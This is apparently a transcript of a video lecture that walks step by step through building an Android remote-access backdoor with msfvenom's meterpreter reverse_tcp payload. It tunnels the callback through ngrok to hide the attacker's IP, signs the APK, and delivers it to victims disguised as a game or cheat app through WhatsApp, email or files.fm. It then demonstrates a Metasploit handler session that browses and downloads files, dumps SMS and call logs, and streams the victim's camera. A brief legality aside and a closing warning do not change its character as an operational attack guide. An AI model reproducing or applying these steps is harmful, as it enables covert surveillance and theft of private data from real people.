[Music] hi within this section we're going to discuss how we can create a backdoor so that we can get an access to the target device that is a phone or a tablet so that we can discover their files discover their folders get full access of the target device like opening their webcam or camera and accessing their private information and this is very achievable using kali linux and we're going to see how we can do it with details however there is also another issue that we might want to consider before we start once we create a backdoor once we create a malicious file that lets us access to the target computer or device or tablet or phone it's also wise to think how we can deliver that file deliver that malicious file to the target person that is using this phone or device this is very easy to do in devices like computers laptops because you can just email them and someone can download the exe file and double click on them and it will work but it's not the case for phones right so if you are using ios for example then i believe you won't remember any time that you downloaded something from the internet and just double clicked on it and played it why because we use app store to install applications on ios devices like iphone or ipad right so there is an official app store and we download the applications from here so suppose that we managed to create a backdoor a trojan or a malicious file for ios so how are we going to deliver this so maybe you are curious about this stuff and you found out about a way to install these files to your iphone but most of the users like 99 percent of the users won't even know that and even if they knew they would get suspicious and they won't install your file so we can play we can upload it to the app store right so they can download it from the app store yep it's it's not possible actually because apple checks every app store application before they release it so when you develop an application for apple you upload it to the app store and you wait for something like two to three business days because they review your application and they see they look if you have anything malicious in that application that's not very possible but even if you manage to hide it from the developers of apple it even if it gets released on the app store they will take it down after a couple of days so maybe you have heard that uh some kind of trojans are backed or circulating in the apple ecosystem in the past so how did it happen so first of all the restrictions of app store got stricter and stricter each day every day once uh they discovered that um there are some certain malwares and there are some certain data leakages to the apps but there are still some ways theoretically to overcome this problem for example there is something called apple developer account and you need to have that in order to upload your apps to the app store and you need to pay 100 every year in order to have an apple developer account but there is also another thing called apple business developer account which is uh 300 per year and once you get that actually you're allowed to publish your applications without uh uploading them to the app store so that this is for business to business applications so regular people do not see your application but the people you want to distribute this app to just can download this application around there around on their iphones or ipads so theoretically it's possible to open a business developer account and distribute your app to this way so that people can actually install this in their phones in their ipads and stuff but this is costly and it will be noticed in a couple of days and it will be taken down so in i believe in the past year a russian hacker group managed to do this with exactly the business developer account and they got noticed in a couple of days and they got taken down but maybe they had reached their target i don't know so it's possible but it's not applicable to the real world most of the time so what i'm going to do instead of this i'm going to focus on android backdoors because you can actually use android backers in real life examples because even if we have google play like this even if we have google play to download the applications as an official app store on android devices we also have other services other ways other ways of downloading applications and installing them on your android phones as well so even if we know about creating ios vectors we won't even use them in real life but if you know how to create backdoors for android in a perfect way then you will be able to practice it of course within legal boundaries in real life as well so that is the reason why we're going to do this so of course google play is a way of distributing your app as well but it will get noticed and taken down eventually so what we're going to focus on instead creating our backdoors and distribute distributing them via emails or whatsapp or any other majors because um the people the users of android can actually click on the apk that is the final product of an android development and run it on their own iphones or not iphones samsung's or any other android phones or tablets all they had to do is actually allow the unknown sources to be installed their phones and once they once they click on this apk file the phone will ask them if they want to install this or not or if they want to unload this or not if they allow it it will be installed and luckily most of the android users actually love this because they want to download the other files other sources just not depend on only the google play so this is an advantage for us so if you're going to test this on your own android phone or android tablet make sure you open these unknown sources as well from the settings and i'm going to show you how to do that uh during the lectures as well don't worry okay and the reason that we're going to start with this is to practice the kali linux a little bit learn about android terms a little bit so that we can move on to the real thing where we learn about programming and reverse engineering the app manipulation and everything so if you have experience on this apk files or kind of creating backdoors for android before just be patient with me we're going to see how we can use a tool called msfvenom in order to create a backdoor for our android devices so the tool is that we we're going to use is called msfvm or msf venom however you may want to pronounce it let me show you how to spell it uh in order to do that of course you have to open your cali linux and you have to open your terminal and make sure you're ready to write some commands on your terminal i believe you know how to install kali linux how to run it how to run your terminal by right now if you have skipped the previous section make sure you go back and watch that before coming here so over here we're going to use msf venom and in order to do that first of all i'm going to type msf venom like this and hit enter in order to see the documentation of the msf venom of course we're going to write a lot of parameters but at this point you don't know any so first of all i'm going to show you what are those so we use this msf venom in order to create backdoors in order to create some malicious files and it all starts with payloads so what are payloads we use payloads we use this tools in order to uh select what kind of operating system that we're going to hack in and what kind of session do we expect back and what kind of port and weight that we should follow to hack in so maybe you don't know these terms don't worry i'm going to explain everything as you can see we can see the payload over here it's actually dash dash payload or dash p we need to specify this payload otherwise we won't get any backdoor created and remember msfvm is not only for creating vectors for android we can create some backdoors like malicious files for windows and other platforms as well so we need to specify the platform we need to specify the technology that we are going to use to hack into the target computer or target device so i'm going to write it down first and i'm going to explain it part by part to you and we're not going to finish creating our back during this lecture we're just getting familiarized with msf windham so that we can comprehend all of this stuff so all you have to do just right now is write um is to write msfvm dash p like this so msf um not cmsf windom dash p and then we specify the payload that we're going to be using for this so you first start with the operating system like if you're going to do this for windows then you write windows over here if you're going to do this for android then you write android over here okay so in our case of course we're going to go with android and then you put a slash and then you write the session that you want to expect to get back i'm going to explain this a little bit later on in this lecture but right now just write meter printer so it's either pronounced that as meterpreter or materpreter it depends on the country that you live in i believe so i'm going to call this meterpreter and it's spelled as m-e-t-r like this p-r-e-t-e-r meter printer and then put a slash and then write reverse tcp reverse underscore tcp don't worry i'm going to explain so android is the operating system that we're going to be attacking right and you know it and meterpreter is the session so this manages a session manages the connection between the target computer or target device and the kali linux or attacker device so in this case we're going to attack an android phone and when android phone connects back to us then meter printer will create a session actually this payload will create a meter printer session in which we manage this session in which we manage this connection so that we can send some comments to the android to be executed like browsing the files or opening the camera of the phone or something like that we do this with a session called meterpreter it's very advanced it has a lot of comments built in so that you can interact with the hacked device and then later on we have this reverse tcp this is the way that we are trying to hack into like we could have written over here something like reverse tcp reverse http so the reverse means that connection will come from android phone to us it won't be coming from kali linux to the android phone because it will be much more detectable if we try to send the connection from here to this form but if we send the connection from android phone to our cal linux it would be much less detectable okay and it is the actually it's the case for the windows and other operating systems as well we don't use bind we use reverse connections when we try to create backdoors so tcp is the port is the gate that we are trying to go in we could have used http or https as well in my trial and errors i found out that reverse tcp is the way to go so that i'm going with reverse tcp if it doesn't work for you you can just try to create something with reverse http or https as well so once we do that um we're going to specify a little bit more parameters within the couple of following lectures and it will create a backdoor a payload for us once we send this file to the target computer or target device the android actually in this case i'll run once the user taps on this file it will create a session between kali linux and android phone so that we can easily access all the files and folders and comment system inside of those phones or those targets we're going to discuss the ip address of that we're going to be using to create this backdoor and some other very interesting concepts regarding to this ip issue over here so we need two more parameters in order to create this backdoor which is uh lhost and airport they stand for local host and local port respectively so it means that the host the ip address that we're going to be expecting this session to come and that part means the port number that we're expecting this session to come as well so this will be something like one 192.168.11 and part will be something like 80 80 or 40 40 or something like that so what is the issue why don't we just give the ip address and wait for connection to come over here so there are actually more than one ip address that we can give over here so if you have ever watched a section like this or a tutorial like this in youtube or any other websites most probably you will see you would see something like local ip address is put over here actually there more than one ip address if you go to google.com and search for what is my ip address then you're going to get your public ip address which is the ip address of your router your modem okay this is not the specific ip address of your current device this is the ip address of your router so if you go over here and say what is my ip or google it will give you some kind of this public ip address i'm blurring mine so that you won't see mine but you can just click whatever website that you want to use over here like what is myipaddress.com and you will find out your own ip address and this is your public ip address okay this is the router's ip address i'm going to explain what public means what local means in a minute but the problem over here is that if you give that public ip address to this backdoor then it's not safe for you it's not safe for the hacker because in real life if you if a hacker commits a crime they can actually analyze the backdoor and they can see the public ip address on that back door so that they can try to locate the location of the hacker with that information so hackers use other platforms other tools in order to overcome this problem in real life in order to be realistic we're going to use those information use those tools in our example as well so i'm going to explain what a local ip is and what a public ip is with a detailed presentation to you so it won't be some kind of vague thing in your head so when we try to visualize how internet or how networks work we can use this chart so there is a router in your home and you have some kind of devices like phones and macbooks or imacs or computers or laptops and they're all connected to that router because they want to go to the internet so when they try to go to google.com for example they send some requests to the router and root or send some requests to the internet they get some responses back and router forwards that responses to the related device okay so this is how requests and responses work but over here we only have one public ip address which is uh 85. 100.25 149 in this case but also we have some local ip addresses as well so these local ip addresses are assigned by router with some kind of tools to the individual devices in your home or in your network okay so what you see as one nine two one 168 or 10 or 11 or 12 represents the local ip address of the individual devices so router generally gets the first ip address unless it is configured otherwise so it is 192.168.01 so they use this ip addresses and something other as called mac addresses in order to circulate this information with the network in order to have this kind of communication with the network okay but we use public ip addresses in order to communicate with the external world so if you guess that uh every individual device in this house has the same public ip address then you're absolutely right they have different local ip addresses but they have only one public ip address so if you want to get a connection from some outer world you have to give them your public ip address which is not safe because it's detectable it's trackable okay and also you have to do some kind of part forwarding in this case even if you are willing to share your information with a backdoor then the router has to know which device it should forward their information to in order to forward the uh related information for example you hacked into the android android gave you the connection back you got it from the router but router should know whether it should forward this connection to iphone or imac or macbook or kali linux or any other device in the house and this operation is called port forwarding it's pretty easy to do that but it causes some problems with some kind of internet providers so in order to eliminate this part forwarding and in order to eliminate the safety issue that is brought us by sharing our public ip address we're going to focus on something called tunneling okay we're going to use some services and we're going to make that service part forward or forward those information to our computer to our catalytics directly so that we won't be sharing our public ipv with the backdoor with the malicious file that we are trying to create and also we're going not going to deal with the port forwarding in a router level in our own house or in our own network so that's actually how hackers in the real world work as well so let me show you some kind of examples regarding this local ipa as well so that you will comprehend it in a better way so what you can do you can open your terminal inside of kali linux i'm going to open a new tab and write ifconfig ifconfig and what you see over here is 1002.15 or something like that and it's our local ip address so i'm not going to write 100215 over here i'm going to write some other thing that i'm going to show you in a minute but maybe you you may think that uh what is 10 02 15 you said that 192 168 something like that so one uh 1002 generally refers to nat network ip addresses so we're using some kind of virtual network inside of our virtual box remember we are using net network so we have this 1002 215. if we use some kind of usb wi-fi card to connect our kali linux directly to our router then we would get something like 192.168. okay and it even it doesn't even matter what kind of ip address that we have uh if we if we have a working local network so maybe you can see something like one seven two one six eight as well rather than 192. that just don't be surprised it's possible and over here as i said before we're not going to use those information in order to create our al host and airport but rather we're going to use something called tunneling but it's essential for you to understand this information so that you would understand what are we trying to do with the tunneling service in a minute okay we're going to discuss tunneling services in order to overcome the problems that we have seen in the previous lecture so in order to do that we're going to use something called ngrok dot com okay so this is a tunneling service but what is a tunneling service and why do we want to use one of course we're going to use it for our backdoor but there are other various uses in order to leverage this kind of tunneling services in real life for example in our kali linux we have actually a web server okay you can actually host a web service in your kali linux so let me clear this tab right now we're going to write it later on anyway so i'm going to write service apache to start so when you do that it will run a web service in your kali linux so actually there is a web server going on in your kali linux right now and you can change the content of it in order to host a web server or i don't know website in your kali linux for example if you go to your file system okay to your folders i will show you where your website is right now so that you can edit it and use it if you need it we're not going to need it anyway but i'm going to show it to you so that you know how to use it so if you open your file system i'm going to wander into file system and a directory called var var okay so if you go over to this var you will see a folder called www which is your website and you're gonna have to double click on this html and you will see this index.h so index.html is the file that you see when you browse into a website so whatever is written over here will be displayed if someone browses to your website right now i'm running this web server but since my kali linux is on the net network only the files or only the computers on the net network can actually see those files see the website that we are running but we can use ngrok to open this website to the world as well so if you open your browser okay in your kali linux like your firefox and if you're on ifconfig to see your ip address you will see minus 100 215 i'm going to write 1015 in my browser and you will write your own ip address and what i will see is the content of my index.html as you can see this is a default page that is created as a test or as a default website and i'm now seeing it if i had another machine on my virtualbox i could have written 100215 to any browser from that machine and i can reach this website as well and if i use ngrok i will be able to open this website to the public that's not what we are looking for but tunneling service lets us connect our local ip addresses or local machines to the internet using their own services so that we can actually gather the information to the ngrok ips from the backdoor from the android phone and forward that information to the kali linux using the same system okay we're going to use it for this reason but remember the tunneling services may provide much more broader or greater advantages in given time so what we want to do is to set the angle up in our computer so that we can reach their services so that we can actually for with that information when it comes to the n graph to the kali linux so that we can create our session so that we can uh hack into the android phone and get access to their privileges browse their files and folders and everything so that's what we're gonna do so first of all i want to go to angrag again and download some files and folders and set up some account information with ngrok because we we will need those information uh you won't be able to use the ngrok without creating any account okay so what i would suggest is to close this down because we are done with it and minimize this tab and open the firefox and then next thing we're gonna do we're going to write ng like this ng rok.com over here and once we do that we're going to register for an account so you see login and sign up buttons over here of course this team or some kind of user interface may change in overtime but they will always provide some kind of login or sign up register options so you want to register for an account don't worry it's free by the way but you you're going to have to provide some kind of email and other stuff in order to create an account so i already have an account so i can go to log in but i'm going to show you how to sign up as well so let me click on sign up and as you can see you will only provide your name your email and email again and a password and it will create your account for you so it's fairly easy so rather i'm going to log in with the previously created account of mine and it will direct me to the same page that you're going to see when you sign up so i made up an email for this like jquerox at gmail.com and password is something like this let me save this um yeah let me update this and it will ask me to complete an installation or setup process so this is what we are looking for as you can see anger can be used in mac os in windows and in linux as well since we are in linux we are seeing the button for linux but if you want to use this in windows or in mac for some reason of course you're allowed to use it but i'm going to download for linux so i'm going to click on this button and i'm going to say save file okay it will download the file for me and then of course i'm going to have to unzip it because it will be kind of zipped you can use unzip comment in order to unzip it or you can just right click on it and unzip it yourself so let me open the downloads file and show you what i mean so open your downloads file from your file system okay it should be under root so root downloads once you double click on the downloads you will see the angry downloaded file over here so this is a zip file and catalytics also have its own archiver so if you double click on that you can see the angry you can just uh drag and drop it to your own folder like this okay so it will be unzipped of course you can use the unzip command as well in order to get familiarized with kali linux a little bit more so after that let me come over here uh you're gonna have to connect your account so since you have created this account it will give you this kind of an authentication token so yours will be different from mine so you're gonna have to copy it from your own account i'm going to close down my account so don't try to write my own token over here create your own accounts and just copy this comment from here so i'm going to copy everything and i'm going to paste it on my terminal so that it will be authenticated so that it will be ready to use and don't skip anything just make sure you get the whole line over here okay because otherwise it won't be authenticated and it won't work so once you are ready you have to open your terminal one more time and uh change your directory into the downloads folder or any other folder that you have downloaded your tool into so mine is in download so i'm going to say cd downloads and now i'm inside of downloads if i just paste this selection or clipboard over here it will run the angry and it will authenticate me using the token okay now my token is saved i'm free to use anglog services so that's how you install and that's how you set up your environment for tunneling services next we are going to be finally ready to create our backdoor for android devices using this tunneling services so if you go to documentation of this angry.com you will see a lot of usages and a lot of comments that you can use you can leverage in your own environment as you can see in order to create some kind of connection all you have to do is just specify the connection type and the connection part that you want to use i'm going to show you what you can do or what you have to do in order to make this work don't worry but if you want to use angular for some other special occasions later on make sure you read this documentation because it's very useful actually for example in here they're trying to expose a web server on part 80 of your local machine to the internet and that is what we have seen in the previous lecture when we tried to start the web service of apache but that's not what we're going to do right now we're going to use this for sending the connection to from the android to the ngrok so in order to do that of course we're going to use the same thing i'm in my downloads folder one more time in my terminal and i'm writing dash ngrok tcp and a port number so maybe you can think something like that uh yeah you're talking about parts a lot of times during this training but you didn't explain what a part is and you're correct so we are sending some requests and getting responses when we deal with internet operations in our daily life so every connection like going to google.com or receiving that connection from android phone requires some sort of a gate some sort of a port to be processed on so every connection uses its own um specified gate like um 80 for http requests or i don't know 22 for ssh requests and for mail requests we have a lot of different ports for some kind of other special services or special connections we have other parts so we have some respective gates respective parts for different kind of connections and firewalls actually try to observe these gates observe these parts so that they won't be left open for any kind of incoming malicious connection okay so we're going to use a port that no one else is using something like 42 42 or any other thing like 55 55 and if it doesn't work for you for some reason you may choose to use another part for example i'm going to write 4242 over here and since we do not have any kind of firewall in our kali linux it should work fine so i'm going to hit enter and as you can see it started to work and we're not going to come across with kind of fireballs in android as well so most of the time this 4242 will work out for you but if it doesn't just try 5555 or 6666 okay so as you can see it's now started and it's some kind of doing a forwarding operation which is uh what we are looking for as you can see we are forwarding this tcp dot ngrok dot io with this port to our local host so this address and this part would be different for you maybe different for you i have 17 uh 197 over here and in the localhost of course we have our specified part over here like like 4242 but this will change for you but we're going to use this so i'm going to use this as a local host and a local port in my msf venom because why because remember we want to direct the connection from the android phone to the ngrok and then later on from the ngrok to our own localhost to our own kali linux machine using this service so that is exactly what we are doing right now so what i'm going to do i'm going to give this as an input to l host and give the port to as an input to the outport in my msf venom so you have to do exactly the same in order to succeed so this would be different for you even the address would be different for you so make sure you copy your own not mine so over here i'm going to use this and i'm going to use 1797 as a part and this will receive the information and forward it to me once it comes so don't close this down just open a new tab from the file and say new tab okay because if you close it down the service will stop so open a new tab and write the msfvm code command that we have written before so as a payload parameter i'm going to specify android printer and then reverse tcp okay the reverse underscore tcp and then later on we have to specify the lhost and say equal to and this will be equal to the um zero dot tcp dot ngrok dot io i believe and the output will be seven um thousand and seventeen thousand one hundred ninety seven so i'm just going to copy and paste those um zero tcp and grog io so it's easy i can write that without forgetting i suppose zero dot tcp dot ngrok dot io and then a part will be so 17 let me see it yep 17 197 so 17 197 here we go now we are okay and then we specify where to put this um payload where to put this apk file that we have been trying to create in order to do that you can just write the results like dash r and specify the folder that you want to put it so that you can access it easily and you can forward it so i'm going to say r okay with a capital r and say this greater sign it means that just write the result into this folder into this location okay so r greater than slash root slash downloads or documents or any other folder that you may want to put this so i'm going to say ngrok.test apk and i'm going to put it inside of my root folder directly of course you're more than welcome to use another name for your apk but don't forget to specify that apk extension at the end of this i'm just going to call this test because we're testing it okay in real life example it would be something like game dot apk or i don't know super cool application dot apk because you're going to send it to victim next so here you go i believe it's now created for us let me minimize this and let me go to root folder and here we go we see the ngrok test.apk so this is the exact file that we are going to send to the victim and once once the victim installs this we're going to now that we have created our malicious apk file next thing to do is actually we're going to send it to the victim but once they click on it once they run this file we will get the connection so before we do that we need to be prepared we need to be ready for this connection and the way to do that is to listen for incoming connections on our kali linux so whenever you want to hack into some computer or some device you should listen for connections so that's how you get a session out of this hacking okay luckily we have a tool embedded in kali linux for that as you can see my ngrok is still working on one of the tabs and i'm not going to close this down because it will kill the service okay i'm going to leave this as it is and this will forward me to the connection once the victim clicks on the apk file on their android device it will forward to i d forward the connection to the ngrok and then ngrok to me and i should be prepared for this so i'm going to run this comment service postgresql or sql however you may want to pronounce it and start so this will start a database service called postgresql and the reason why i'm starting this is because i'm going to use something called metasploit okay metasploit uses this as the as its database and metasuploit is a tool commonly used in penetration testings so you can write msf console and hit enter in order to start meta exploit so with metaexploit we can actually listen for incoming connections we can find a lot of exploits that can work on some of the vulnerabilities that are commonly found in servers or computers we are not interested in servers or computers in this course but we are interested in telephones and tablets or mobile devices but we can use the listening feature of the meta exploit as well in order to receive this session so after you run msf console you will see a screen like this where you will see the msf console okay that's how you write comments inside of metasploit once you see that you can just begin typing msf or metasploit commands it's fairly easy to use actually as you can see we have a lot of payloads a lot of exploits embedded in metasploit as well but we are particularly interested in a a module called um multi-handler so this module exactly does what it sounds like it's a multi-handler multi-purpose handler we can use it to listen for incoming connections and in order to do that i'm going to write this use exploit slash multi-slash handler okay this is how you specify the modules inside of msf inside of metaexploit so we are interested in this multi-handler module so once you hit enter it will enter into this module and then you can see the options and features of the specific module so first thing to do is to set the payload to the exact payload that you have written before because as i have said before you can create many backdoors for windows or linux or android and other operating systems as well since we have used android i'm going to do the same thing over here as well so i'm going to say set payload and then i'm going to write the exact notation exact same sign text that we have written down before which is android slash meterpreter slash reverse underscore tcp and this is reverse reverse underscore tcp once i write that i will hit enter and as you can see it has already this it has already assigned payload to be this way so when i say show options it will show me the options of that specific payload and specific handler so we have to specify the lhost and alport but this time it's going to be a little bit different than before because as you can see we have specified this to the back door because this is where we will receive the back doors incoming connection but also in kylie linux we will receive the connection in the local host and in this port so this time i'm going to go for localhost which is 0 0 0 0 and for the port i'm going to use 4240 so don't get confused over here we have used the left hand side in the back door and we are using the right hand side in the listener part so in order to set a value over here you have to say set the value name and the value itself like set at host and set outport 4242 like this okay once you do that you can say show options and you will see the input that you have given is already over here so now we are ready to be listening for incoming connections so since this is a payload or exploit kind of tool we have to say exploit in order to start for listening and i will add this dash j and z in order to listen this in the background so this will be running in the background but this will not lock our terminal so we will get notified once we have the connection back from mangrok and we can just interact with the session okay so right now all i have to do is just transfer this ngrok test.apk to the victim machine so there are a lot of ways to do that actually you can just send it through the whatsapp you can just send it through with email uh you can just find a lot of different ways to transmit this maybe you can just upload this to a server or upload this to any kind of file transfer website and ask victim to open this so it goes like this you just email someone hackers actually malicious hackers bad hackers emails email people and say that yeah we have this kind of tweaked game you can uh do cheatings with this apk if you want and they download it and they click it and then and then they get hacked obviously and the way to do that is actually find a file transfer service which is commonly available on the internet but i'm going to you go for files.fm which is essentially something like vtransfer.com but apk files can be blocked in some of the services but i found out that files.fm actually allows transferring dot apk files so maybe you can try that but if you cannot make it work you can always try other services as well or you can try to email or send it to any other communication channels so as you can see i have uploaded my file and it has given me a link so the next thing to do is actually sending this link to the victim but as a demonstration purpose i'm going to go for my local machine which is my host machine my mac and i'm going to try and see if i can download this file to my mac okay i suggest you do the same because we are not done here actually we're going to need one more step before we send this link exactly to the victim we have to sign this apk as well before we send it i'm going to explain what this is don't worry and here you go i believe we have managed to download it and here you go our apk file so one last thing to go before we make this happen and that is signing now we have created our apk there is one last thing that we should do before we send them to our victims so we need to sign this and by signing i mean having a signature identifying us as a developer so without doing this some of the devices actually most of the devices won't accept this apk and won't run it you may be able to install it on your own machine but you won't be able to run it so in order to avoid this problem we're going to sign it so you have transferred this apk to your host machine which is maybe windows which is maybe linux or which is maybe mac so i'm going to show you a way to sign this and if it doesn't work i'm going to show you some alternatives so that you can actually do this process so if you're on windows click on the windows sign and write cmd in order to open command prompt and if you're on mac just open your terminal and if you're on linux of course open your terminal as well so we need to run some commands and i'm going to show you what are those commands and remember sometimes it doesn't work i'm going to show you some alternative ways to fix this problem or some other tools to overcome the signing issue so this is a long command actually so i have it on my notes i'm going to copy and paste from my notes and of course i'm going to include those codes in the resources of this lecture as well so this is the code that we are going to run this is the comment so it uses a tool called key tool and it generates a key store file which is a file identifying the id of the developer so it will ask for some information like your name your country and some other stuff and it will ask a password as you can see so give some password and give this password one more time and when you see this first name last name and stuff you can just skip it by hitting enter and for the last time you will see something like no and just write yes and hit enter so if it doesn't work for you don't worry i'm going to show you an alternative remember so this created a keystore file but since i'm not in the desktop i should have written cd desktop and then run this comment i am in my users until sam so i believe it created file over here like this so i'm going to move this file to my desktop so it's essential that you have this two files side by side it doesn't matter if you're on desktop or on your downloads or your own documents just cd into that folder from your terminal okay so i'm going to cd into the desktop and then later on i'm going to run the second comment so copy and paste the second comment from the resources of this course okay from this lecture and we are going to use this keystore to sign this apk and this jar signer tool does exactly the same all you have to change is the name of this file so if this is angr test.apk for you you don't even need to change that it will ask you for your password just give the same password and hit enter and now this is signed so if it didn't work out for you what you can do so the reason why it might have failed for you uh you need some jdk tool in order to run this jar signer okay jdk stands for java development kit so let me show you let me go to google.com you don't have to do that right now so let me search for jdk and here it is so this is java development kit and in fact two lectures uh later on we're going to install this to our machines and we're going to install some ide called android studio and we're going to run some java codes as well but right now we don't have this so an alternative tool is to find an apk signer on google play like this as you can see if you search for apk signer you get a lot of results so do that within your own android device okay so search for apk signer and just download the first one that comes up that way if you download your apk from files fm to your own phone or on tablet android tablet okay and then if you use this apk with apk signer app that you have downloaded then you will be able to do exactly the same thing that we have done with the comments okay this tool does exactly the same thing so if you download this and if you download the apk you can just sign it with inside your machine as well then you can upload it to some kind of server or files fm one more time and then send it to the victim and if you don't have any android device at all you can use some something called emulator a simulator okay an android software that simulates the actual android forms and you're going to see how to use it in the next section as well in this section we're just warming up we are getting you familiarized with concepts of kali linux of backdoor on and off hacking as well so we don't have android studio we don't have jdk right now so you may encounter some kind of difficulty like a jar signer thing but you can overcome this wet apk signer obviously after you do that of course you can just go to files.fm one more time or any other service and upload your signed apk so if this doesn't work out for you just go to the next section download the jdk and then try one more time okay so if it did work out for you i suggest you don't delete this keystore or if you have downloaded apk signer don't delete that application because we're going to use this a lot during this uh training but i promise you it will work out eventually after you download jdk and sdks of android studio so don't worry about that now we are ready actually i have sent those links to the victim and i have my anger working on my kali linux i am listening for incoming connections with metasploit tool and i believe we are ready to test this so all you have to do is just send the link to your android device and again if you don't have any android device to test this on wait for the next next section where you will learn how to use android emulator so here we go in my own android tablet i'm downloading this apk as you can see and once it's ready it will be ready on the downloads folder like this so if i click on the ngrok test.apk it will ask me for some kind of permissions and i'm going to say install okay so this will install the application on my tablet and if i say open then it will open the application and at the kali linux as you can see the meterpreter session one opened for me now i don't see anything on my tablet right now so if i was a victim i would have thought yeah this app doesn't work but in fact we managed to hack into that android device as you can see we have the session over here in kali linux so if you hit enter now the session is opened in order to reach those sessions you should run sessions dot l so this will list the sessions as you can see we have only one and um it's an android device and you can see the connection is coming to my local host so if you say sessions dash one so this is the id of the session it will go into the meter printer session as you uh know by now meter peter is the session handler for us so if i run this info it will display the information of the victim system like this so this is an android device it runs on 444 version and if you run help it will display the available commands for you to run and in fact you have a lot of comments a lot of options on meter printer sessions so this is the beauty of the meterpreter you get to see what are the options and you get to just run them and see the result back in an instant okay so you can actually browse through this help documentation of the meterpreter so that you can understand what's going on and you can read the descriptions like this so i'm going to show you some of the most popular ones and you will see there is a section dedicated to android commands over here like uh you can dump the call logs you can dump the sms messages uh you can try to send an sms actually you can just set the audio mode you can just set the wake lock and wake lock or something and you can actually run ls and a browse to the file system of the android device as well for example let me go to cd dot dot and cd dot dot one more time and i believe we are inside of data data folder right now if you're in someplace else you can browse to the data data as well right and let me run pwd yep i'm inside of data data so let me go to some other command some other folder over here let me go to root folder and run ls to see my options first yep here you go we have a lot of files and folders over here i can try to find some sensitive folders and files by just browsing through this file and folder system of the android device over here i can download anything i want i can try to upload new files to the system using this meter printer session and the commands are very basic you just gonna have to read the description but it's upload and it's download followed by the file name okay so once you get the session it's very easy to move on from here for example let me go into sd card cd sd card okay and if i run ls i will see the contents of the sd card like you can actually reach the music downloads movies like you can go to downloads for example or pictures and try to see the pictures of the user so let me run a list to see if i have any yeah i have something called ik screenshots i believe yeah let me try to download this and you will see what i mean so download ik screenshots and it will download this file for me and save it to my root folder okay and you can try to display this with inside your file folder system inside of kali linux obviously then let me go back a little bit and let me go into some other folder like downloads okay i believe it's named download yep so download and let me run less here you go we see our own file angular test.apk so these are files that our user have been uh has been downloading all the way through right so as you can see we managed to hack in and we are browsing to the file and folder system this is very cool so there are actually other commands like sending sms or getting the calls uh but i don't have any a kind of sim card inside of my tablet it's not even a phone it's a tablet like an ipad okay so i i'm not going to be demonstrating those examples but if you're doing this for a phone of course you're more than welcome to test this on your own time just sending sms or sending uh trying to get the call logs or something but as you can see we have something called webcam stream and this is one of the most popular commands like uh you can use this webcam stream to open uh actual webcams on computers but in the devices mobile devices it actually opens the camera of the related device like if you're on a phone you can actually see what's going on around the user around the victim by using this command so let me display this obviously i have a camera on my uh tablet so let me run webcam stream with only one m okay let me delete this and hit enter so this will uh start a service for me and it will give me some kind of a web link or something some html file for me and i will have to open it so don't close this and don't hit on any other word or any other um key from your keyboard so this should be running on its own okay and copy the selection so as you can see this is running some kind of html file on my root folder and if you go to your root folder with your file manager you will see that html file but rather than seeing it if you open any firefox tab you can just paste it okay and you can just open that html file on your own machine and now i see my tablet phone or tablet camera or my phone's camera as you can see this is my garden i'm just holding up the tablet so that you can see what's going on and let me try to go into the image as well but i believe yeah it it is kind of shady so you cannot see me clearly but uh obviously we managed to hack into and obviously we managed to get the phone or tablet camera stream as well so after you are done with it you can hit ctrl c to stop this from streaming okay so it will go back into your session and you can continue whatever you want to do with the meter printer session over here and remember it um displays it actually puts the files on your root so you can reach those files that you have downloaded or that you have streamed from your root folder later on so this is kind of cool right we managed to hack into the device we managed to browse all the information we managed to download whatever we want and we managed to actually open the um camera of the phone as well so you can try to go into the data of the related apps like that's app and other apps as well try to find the logs and uh try to see if you have anything useful over there and it's very easy to hack into the devices using msfvm if you can come up with a good strategy so beware of the hackers obviously so if somebody sends you some apk don't open it if you don't know them if you even know them if you get suspicious don't open them because it's very easy to get hacked as you can see so it's not even easy to hack into the windows machines because of the defender and other anti-viruses but in android in real life they won't even get detected okay so if you send them and if they click on it it will just pop open and you will get hacked so just keep that in mind if somebody sends you apks just don't open them i suggest you stick to the play store so of course somebody could have uploaded this to the play store as well but it will get down eventually it will be taken down eventually they generally understand it in a couple of days so you won't have that kind of risk over there at least a very high risk but uh if if somebody sends you some apk through what's app or some other platform just beware of it so that's it we're going to stop here and we're going to start learning about android development within the next section